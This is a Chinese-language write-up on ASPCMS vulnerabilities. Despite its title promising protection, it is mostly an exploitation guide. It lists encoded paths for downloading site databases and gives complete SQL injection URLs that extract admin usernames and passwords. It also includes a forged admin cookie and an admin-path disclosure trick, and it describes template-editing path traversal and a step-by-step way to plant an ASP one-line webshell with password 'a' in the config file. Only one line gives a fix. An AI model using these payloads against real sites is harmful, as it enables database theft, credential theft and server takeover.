ASPCMS各版本漏洞及防护

程序介绍：

ASPCMS是由上谷网络开发的开源ASP语言编写的企业建站系统，2015年后官方未再更新，最后版本为2.5.8。

后来由星梦作为民间开发更新到2.7.3版本。

最新更新日志：

★2.7.3  2017年09月25日（By XingMeng）
1.强化手机端域名绑定，手机访问非绑定域名自动跳转绑定域名
2.修复大量时间格式数据库兼容性问题
3.修复留言内容和联系人提示信息错误问题
4.修复默认模板留言板提交路径问题
5.新增内容详情页自定义任意时间格式(yy,y,m,d,h,mi,s自动进行替换时间内容)
6.其它部分程序优化

WEB指纹：

inc/AspCms_SettingClass.asp
inc/AspCms_MainClass.asp
inc/AspCms_CommonFun.asp

各版本数据库（还在收集中）

ASPCMS最新版2.5.2以及ASPCMS2.3.x都存在这个问题，应该是通杀
在ASPCMS2.3.x中，ASPCMS的数据库在/data/目录下，为了防止数据库被下载，把数据库文件data.mdb重新命名为#data.asp，由于设置不当，使用%23编码#即可绕过访问，导致信息泄漏：
http://127.0.0.1/data/%23data.asp
在最新版的2.5.2中，把数据库文件aspcms252.mdb重新命名为#aspcms252.asp，由于配置不当，使用%23编码#即可绕过访问，导致信息泄漏：
http://127.0.0.1/data/%23aspcms252.asp
此问题通杀所有版本。下边是收集到的包括一些改版的数据库地址：

/data/%23data.asp /data/%23aspcms252.asp /data/%23data.asp /data/%235Wz4Jr.asp /data/%236Ik1Qv.asa /data/%238Xq3Ex.asp /data/%235Wz4Jr.asp /data/%23aotian5Dp8Gh.asp /Databases/4dsdo0/%254%26764/%23fgf%260O.mdb /_data%5C_dk_%24%25%5E%26.mdb /4dsdo0/%254%26764/%23fgf%260O.mdb /Databases/4dsdo0/%4&764/#fgf&0O.mdb /_data/_dk_%24%25%5E%26.mdb

过去版本发现很多漏洞，在乌云搜索到的

注入漏洞是这个系统原来常见的漏洞，多个文件缺少必要的接收数据过滤机制。

（一）前台页面注入漏洞，涉及版本<=2.1

漏洞出现在
/plug/productbuy.asp
对接收的参数id没有进行过滤而导致的注入漏洞
注入后的页面有跳转，所以要快，建议用快捷键复制
爆用户名

/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

这是爆ID=1的账户名，如果发现权限不够可以往后试2,3,4...........
爆密码

/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

后台登录地址：/admin/login.asp
后台拿shell
1、直接上传.asp;x
2、系统配置信息
3、模版管理新建1.asp模板，内容写马的内容.admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp
修复方法： id用cint(request("id"))

（二）后台没验证同时有注入漏洞

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1

Powered by AspCms2.0
未验证权限，且存在注入漏洞
admin/_content/_About/AspCms_AboutEdit.asp?id=19
表名：aspcms_user
列名：loginname、password
利用EXP：

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

（三）cookies欺骗漏洞，这个只在很早的版本中存在

cookies:

username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

后台测试

/admin_aspcms/_user/_Admin/AspCms_AdminList.asp /admin_aspcms/_user/_Admin/AspCms_AdminEdit.asp?id=1 /admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp

（四）补充一个暴后台路径的漏洞

aspcms的自带插件都存在泄露后台地址的漏洞。
例如下图所示/plug/oem/AspCms_OEMFun.asp文件：

直接浏览器访问： http://**.**.**.**/plug/oem/AspCms_OEM.asp 即可弹出错误提示，然后重定向用户到真正的后台地址

（最后）后台写webshell

aspcms在老版本中可以通过添加模板直接添加asp

后台编辑风格 可以修改任意文件，获取webshell就很简单了 AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp

.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的。

可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.

1、进入后台，“扩展功能”--“幻灯片设置”--”幻灯样式”
2、使用chorme的审查元素功能或者firefox的firebug，总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为

1%><%Eval(Request (chr(65)))%><%

3、一句话木马，密码a。在/config/AspCms_Config.asp

（注意）目前实际看来，到2.5.7就已经没有漏洞了，只有拿到管理员密码进入后台才行。

Dim aspcmsVersion : aspcmsVersion="AspCms v2.5.7 20150120"
Dim currentversion : currentversion = "2.5.7"